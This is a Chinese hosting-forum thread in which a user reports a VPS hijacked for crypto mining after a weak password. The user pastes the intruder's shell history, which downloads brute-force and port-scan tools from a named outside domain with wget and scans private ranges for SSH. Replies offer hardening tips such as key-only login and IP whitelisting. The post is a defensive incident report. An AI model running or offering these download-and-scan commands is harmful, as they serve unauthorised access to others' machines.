一不小心被挖矿了

[复制链接]
查看: 595   回复: 8
发表于 2023-12-24 10:05:21 | 显示全部楼层 |阅读模式
防范意识薄弱,小鸡用的弱密码,没禁用密码登陆,今天登上机器看cpu100%,
马上意识到被挖矿了。看了下历史记录
  1. sudo -i  133  exit  134  nproc  135  lscpu  136  exit  137  nproc  138  exit  139  nproc  140  ls  141  ip r  142  exit  143  wget david1337.dev/brute  144  wget david1337.dev/banner  145  wget david1337.dev/ps  146  chmod +x *  147  ip r  148  ./ps 10.42 22  149  ./ps 192.168 22  150  ./ps 172.17 22  151  ls  152  exit  153  lscpu  154  ls  155  exit  156  top  157  exit  158  clear  159  ls
复制代码

淦塔皮燕纸 david1337.dev
回复

使用道具 举报

发表于 2023-12-24 10:06:09 | 显示全部楼层
拿到鸡第一步。修改密码,3种混合。修改22端口。开启bbr
回复 支持 反对

使用道具 举报

发表于 2023-12-24 10:06:22 | 显示全部楼层
不放心还是重装了
回复 支持 反对

使用道具 举报

发表于 2023-12-24 10:06:53 | 显示全部楼层
第一步不就是禁密码登录改成密钥么,
密钥还更方便:lol
回复 支持 反对

使用道具 举报

发表于 2023-12-24 10:07:30 | 显示全部楼层
端口只对白名单ip开放,稳得一比,你密码设置123都没问题:lol
回复 支持 反对

使用道具 举报

发表于 2023-12-24 10:08:09 | 显示全部楼层
这个矿工不专业,鞋套都不戴,差评
回复 支持 反对

使用道具 举报

发表于 2023-12-24 10:09:07 | 显示全部楼层
密钥,其他都是默认,dmit什么的开机就是密钥,更规范
回复 支持 反对

使用道具 举报

发表于 2023-12-24 10:09:51 | 显示全部楼层
https://hostloc.com/thread-957070-1-1.html




* Linux常用命令:rar a file1.rar file1 file2 dir1 同时压缩 'file1', 'file2' 以及目录 'dir1'



* 资源 https://t.me/MJJ_aliyundrive
* MJJ频道 https://t.me/wearemjj
* Linux命令大全 https://www.linuxcool.com
* HostLoc频道 https://t.me/myhostloc
   

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复 支持 反对

使用道具 举报

发表于 2023-12-24 10:10:00 | 显示全部楼层
三个脚本被删除了。楼主有备份吗 发出来学习下
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则